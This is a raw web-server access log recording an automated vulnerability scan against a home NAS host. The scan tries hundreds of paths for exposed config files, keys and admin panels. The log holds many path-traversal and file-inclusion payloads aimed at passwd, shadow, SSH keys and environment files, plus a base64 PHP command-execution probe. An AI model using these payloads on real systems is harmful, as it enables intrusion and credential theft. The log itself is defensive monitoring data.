185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/admin/system" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/bazelrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/chef/roles/web.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?template_file=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - - 403 - GET https nas.profibot.hu "/?load=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/installation/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:12 +0000] - 404 404 - GET https nas.profibot.hu "/telemetry/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/wp-backup.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/nft/configs/airdrop.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - - 403 - GET https nas.profibot.hu "/?asset=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - - 403 - GET https nas.profibot.hu "/?include=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/doc/admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/run?command=whoami" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/downloads/licenses.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 403 403 - GET https nas.profibot.hu "/.terraform.lock.hcl" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/fraud/alerts.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/pgsql.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/next.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/socket/bridge?method=PUT&url=/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/admin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 403 403 - GET https nas.profibot.hu "/.dockerignore" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/public/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "///////var/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/erp/ledger_map.csv" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/cmslogin/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/config/coinbase.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/phpmyadmin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/oauth/device_authorization" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/spamassassin/local.cf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 403 403 - GET https nas.profibot.hu "/~/.mutt/muttrc.local" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/masking/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/huggingface/token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/drupal/admin" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:13 +0000] - 404 404 - GET https nas.profibot.hu "/qrcode/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/dionaea/dionaea.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?document=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/adm/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/php.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/hosts" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/karma.conf.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?theme=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/rainloop/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/config/wazuh/ossec.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/htdocs.7z" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/netcoremail/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/nuxt.config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/manage/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/eftpos/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/_vercel/insights" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap/cache/routes.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/api/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/qa/payment_methods/settings.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/services/auth/env.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/compile.sh" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - - 403 - GET https nas.profibot.hu "/?config=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/bootstrap/cache/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/sendgrid.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/wp-cron.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:14 +0000] - 404 404 - GET https nas.profibot.hu "/custom-hsm/config.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/login/token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - - 403 - GET https nas.profibot.hu "/?template=../../../../root/.bash_history" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - - 403 - GET https nas.profibot.hu "/?inc=../../../../var/log/nginx/access.log" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/checkout/commission_config.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - - 403 - GET https nas.profibot.hu "/?action=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/admin/login.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/iot/settings.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/:9300" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/plugins/index.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/api/internal/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../proc/self/environ" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/hubspot/config/email_gateway.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 403 403 - GET https nas.profibot.hu "/.eleventy.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 200 200 - GET https nas.profibot.hu "/?file=data:text/plain;base64,PD9waHAgc3lzdGVtKCd3aG9hbWknKTs/Pg==" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 200 200 - GET https nas.profibot.hu "/?file=....//....//....//etc/passwd" [Client 185.177.72.49] [Length 2843] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/storage/framework/sessions/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 403 403 - GET https nas.profibot.hu "/..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%af..%e0%80%afwindows/win.ini" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/////////////etc/hostname" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/etc/opendmarc.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/public/service-worker.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - - 403 - GET https nas.profibot.hu "/?view=../../../../etc/passwd" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:15 +0000] - 404 404 - GET https nas.profibot.hu "/ipfs/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/////////////etc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/deployments/addresses.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/db.sql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/config/filesystems.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/var/log/nginx/access.log" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/admin/dashboard" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/redact/settings.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/billplz/env.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/modcp/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 403 403 - GET https nas.profibot.hu "/.circleci/config.yml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 403 403 - GET https nas.profibot.hu "/..%255c..%255c..%255c..%255c..%255c..%255cetc/passwd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/aws-codecommit/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/payment/stripe.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/ws?auth=invalid-token" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/wp-content/backups/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/ms/service-map.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - - 403 - GET https nas.profibot.hu "/?layout=../../../../WINDOWS/win.ini" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 403 403 - GET https nas.profibot.hu "/.svn/prop-base/props" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - - 403 - GET https nas.profibot.hu "/?source=../../../../.env" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 403 403 - GET https nas.profibot.hu "/.nvmrc" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/etc/hosts" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/core/conf.inc.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/authn/federation.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/translations/" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - - 403 - GET https nas.profibot.hu "/?data=../../../../etc/mysql/my.cnf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:16 +0000] - 404 404 - GET https nas.profibot.hu "/_debugbar" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/_config/config.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/admin/shop-config.js" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/safehold/payment_conditions.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/resend/api.env" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 403 403 - GET https nas.profibot.hu "/.bash_functions" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - - 403 - GET https nas.profibot.hu "/?navigation=../../../../home/user/.ssh/id_rsa" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/ros/config/launch.yaml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/smartpay/orchestrator.conf" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 403 403 - GET https nas.profibot.hu "/.bundle/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/app/entry.server.tsx" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/__graphql" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/index.php?option=com_users&view=login" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/api/transact.dll" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/Procfile" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/keys/private.key" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/poetry.toml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - - 403 - GET https nas.profibot.hu "/?module=../../../../etc/hostname" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 403 403 - GET https nas.profibot.hu "/.htpasswd" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/admin/spf/config" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/vercel.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/guacamole/user-mapping.xml" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 403 403 - GET https nas.profibot.hu "/////////////root/.bash_history" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/mailjet.config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - - 403 - GET https nas.profibot.hu "/?section=../../../../etc/nginx/nginx.conf" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - - 403 - GET https nas.profibot.hu "/?path=../../../../etc/shadow" [Client 185.177.72.49] [Length 122] [Gzip 1.35] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/phpmyadmin/scripts/setup.php" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" +[21/Jan/2026:01:24:17 +0000] - 404 404 - GET https nas.profibot.hu "/archiver/config.json" [Client 185.177.72.49] [Length 8467] [Gzip -] [Sent-to 192.168.100.30] "curl/8.7.1" "-" 